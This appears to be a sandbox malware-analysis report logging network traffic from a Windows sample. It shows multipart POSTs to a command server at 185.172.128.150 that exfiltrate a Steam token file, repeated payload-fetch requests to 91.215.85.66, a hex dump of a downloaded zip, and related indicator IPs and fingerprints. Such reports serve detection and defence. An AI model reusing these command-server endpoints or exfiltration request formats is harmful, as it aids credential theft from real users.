Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJKEHJJDAAKFHIDAKFHHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDBGHCBAEGCBFHJEBFIHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGCHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDBFIJKEBGIDGDHCGCHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDBFCBKFIDHIDHDHIEHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAKFCGIJKJKFHIDHIIIHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJKJDAEBFCBKECBGDBFCHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHIDHCAAKECGCBFIJDBHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBGHDBKEBGIDHJJEHCAHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAEHJJKFCAAFHJKFBKKHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHDBGDHDAECBGDHJKFIHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKEHDBAEGIIIEBGCAAFHHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAECAKKFBGCBGDGIEHCHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDBGHCBAEGCBFHJEBFIHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIJJJKKJJDAKEBFIJDHHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBKFIJEGCAAFHJKFCFCHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAFCAFCBKFHJJJKKFHIHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDBGHCBAEGCBFHJEBFIHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGCHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAFCAFCBKFHJJJKKFHIHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBGHDBKEBGIDHJJEHCAHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBFHDHJKKJDHJJJJKEGHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEBFHJKJEBFCBFHDAEGHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJDGDBFCBKFHJKFHCBKHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAFHCBFHDHCAAKFHDGDHost: 185.172.128.150Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 46 48 43 42 46 48 44 48 43 41 41 4b 46 48 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 31 35 35 64 62 31 37 34 64 33 64 35 62 63 65 32 37 39 65 63 65 66 62 65 39 31 39 36 64 62 33 34 65 35 64 33 32 65 33 64 34 32 32 34 39 36 62 32 66 38 36 30 34 64 65 36 34 61 37 61 30 32 61 66 62 36 32 34 63 30 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 48 43 42 46 48 44 48 43 41 41 4b 46 48 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 48 43 42 46 48 44 48 43 41 41 4b 46 48 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 48 43 42 46 48 44 48 43 41 41 4b 46 48 44 47 44 2d 2d 0d 0a Data Ascii: ------EBAFHCBFHDHCAAKFHDGDContent-Disposition: form-data; name="token"f1155db174d3d5bce279ecefbe9196db34e5d32e3d422496b2f8604de64a7a02afb624c0------EBAFHCBFHDHCAAKFHDGDContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------EBAFHCBFHDHCAAKFHDGDContent-Disposition: form-data; name="file"------EBAFHCBFHDHCAAKFHDGD--
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDBFIJKEBGIDGDHCGCHost: 185.172.128.150Content-Length: 152955Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKEHDGDGHCBGCAKFIIIHost: 185.172.128.150Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 31 35 35 64 62 31 37 34 64 33 64 35 62 63 65 32 37 39 65 63 65 66 62 65 39 31 39 36 64 62 33 34 65 35 64 33 32 65 33 64 34 32 32 34 39 36 62 32 66 38 36 30 34 64 65 36 34 61 37 61 30 32 61 66 62 36 32 34 63 30 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 2d 2d 0d 0a Data Ascii: ------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="token"f1155db174d3d5bce279ecefbe9196db34e5d32e3d422496b2f8604de64a7a02afb624c0------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="message"jbdtaijovg------DBKEHDGDGHCBGCAKFIII--
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 185.172.128.90 185.172.128.90
Source: Joe Sandbox View	IP Address: 185.172.128.228 185.172.128.228

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: NADYMSS-ASRU NADYMSS-ASRU

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49715 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

Code function: 0_2_0042676C __EH_prolog,WSAStartup,socket,WSACleanup,gethostbyname,htons,connect,send,send,recv,recv,recv,recv,recv,WSACleanup,closesocket,

0_2_0042676C

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sun, 28 Apr 2024 23:11:23 GMTContent-Type: application/zipContent-Length: 3884863Last-Modified: Wed, 24 Apr 2024 05:45:46 GMTConnection: keep-aliveETag: "66289c8a-3b473f"Strict-Transport-Security: max-age=31536000Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 0b 3f 98 58 ef da 8c 80 dd c7 12 00 09 49 14 00 09 00 00 00 62 75 6e 63 68 2e 64 61 74 5c 5d 87 a2 aa 3a 16 cd af 89 8a 20 22 2a 16 10 05 54 ec 15 1b fa f7 b3 d6 4e 3c 77 66 bc ef 58 20 24 3b bb 65 b7 e4 29 a5 ac 9e af 7c 75 5d 2b bc a6 ca 55 2a 56 ea a9 7e af 81 db 9b bd d4 66 da 52 6a 65 f7 f5 b5 1d fe 1a b5 40 f5 66 f8 72 c0 df 56 0d 95 da 17 4a 2d f0 23 55 bd e7 b3 b7 bc 2a b5 de ab 3d ba 54 13 f5 45 13 35 cc 94 5a fa e3 83 aa 26 b5 9e 7a cf 95 fa f4 27 18 6b a2 8e 25 9e cb 4a 65 a9 cb 85 03 dc d4 5b 35 1e e8 cd c6 8f f7 50 c5 db 85 42 7f b5 19 40 05 ac f3 07 2e bf d4 e9 96 a8 47 eb fc 7a 5b 2a 8f 2d 42 31 e2 c3 ce d0 4a 7a 23 0c a9 ce d7 25 de bb 4a b1 fb a6 6a 06 0f d5 57 f5 a4 0e 18 af b5 00 1d 3e 36 32 eb 6a 4b 28 95 bc 0d d4 f1 a3 1a a1 9a c4 a5 02 84 45 b4 54 c9 51 7d d6 6a dd 5f 49 8b 8e 52 ee 54 45 6a a3 3e d2 f1 8b 4f c6 2a 99 3a 4a 25 6f a5 da aa 18 02 8b ec aa a6 b2 60 82 66 2b 4f a9 d6 1c 57 3e 15 87 c0 a3 dd 53 8e 49 4e 43 f5 6d ab 36 be a9 7c 77 51 bb 78 6b ba 4b fa eb fb e5 c8 6f bd 44 1d da 82 f4 13 3a ec 6e 34 01 be 0b f5 50 3e be 84 2a 4d 86 5f 7c 1b a9 8d 50 a7 52 40 9d 67 57 00 90 af 6b 98 90 58 dd c1 01 4d 62 4d d5 0b 9a 17 00 48 0d e6 07 f5 11 e0 eb 20 0c be a0 97 c5 23 6f 05 43 43 fb 21 da b5 c6 fd 31 21 52 f5 67 a2 f2 0a f8 51 63 20 22 50 0d 95 ab c2 51 87 33 a0 48 d0 42 f3 46 e7 7c 1d c6 aa 91 29 97 e0 bd ea cf c6 f8 a9 ae 13 dc f0 40 81 bf 57 f3 a8 36 9f a1 5a 03 15 37 90 39 e0 b5 ed a2 af b6 fc ea 91 64 27 60 5f bf 36 c0 7a 72 25 61 c7 c3 b6 85 1b 00 2a 1e 37 00 2c 2e 92 dd 6c 0c e4 a8 8e a3 2e 68 cb 76 9f f4 18 a0 8b e3 50 0d 4f 05 66 e1 8d 15 21 f4 fd 59 b7 f3 23 b3 b0 59 81 37 cd c2 67 d5 d8 b9 76 3d c4 f0 6b 7f a3 00 f0 4a d5 f9 d4 4e 23 5c a5 35 cc 93 d7 c1 d2 c2 a3 5d cc a7 ca f8 ad 1f b6 3c cf 56 47 55 00 7e 99 cb 9d a8 c7 2c bd d1 58 1e 6f 9b 6b 2e 80 23 8f ce 3f 76 a1 16 25 88 30 ac 2b f2 f9 8d 6d d8 28 6d c5 9e ea 61 68 be 4a 47 3e 16 00 83 fd d8 6d f7 d1 56 99 9a 0c dd f7 d3 6b 62 c0 f3 9a f3 42 ab 6a 58 a1 17 bc 56 24 70 92 a9 93 20 ce 95 c7 3f 9b 3c d8 aa f7 16 bd 5e cf 1d cc 25 4b 41 3d 30 5c be 28 ba c3 09 a6 f8 b8 51 ac 6c 3e 8c 3b 78 ad db 23 57 d5 96 40 40 1b 74 49 55 20 1d a6 f3 51 1b a0 8c 08 9a a5 16 97 14 c2 c0 d9 90 19 2f 65 c9 99 37 45 77 c4 95 f5 7d 68 dc e2 5e 4e e2 02 c5 20 89 9e 18 bb c2 8f 91 f9 de 2b 95 e6 fb 0e c8 b2 c7 0f 8d a9 62 52 7a ca ea f7 1a e3 8b 0a 81 9a 86 32 72 a5 66 1e de 84 75 27 6f bc f1 73 1c 7d 31 05 f4 b8 6a c5 7b 10 27 25 b5 c0 19 b5 85 1a b6 3f ce 81 8d 5a 03 fc 4d d5 00 d3 d4 ca ae 39 2e 7c 50 be dd 57 a3 6f a9 d6 f9 63 a0 92 d1 9b 33 c0 00 ed 15 48 5c 87 34 95 a2 42 8a c6 a3 c0 dc df df 3b 31 34 d1 a2 36 35 93 51 33 00 85 b9 f7 32 34 24 8b ec

Source: global traffic	HTTP traffic detected: GET /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 19 Mar 2024 23:10:10 GMTUser-Agent: Microsoft BITS/7.8Host: download.iolo.net
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
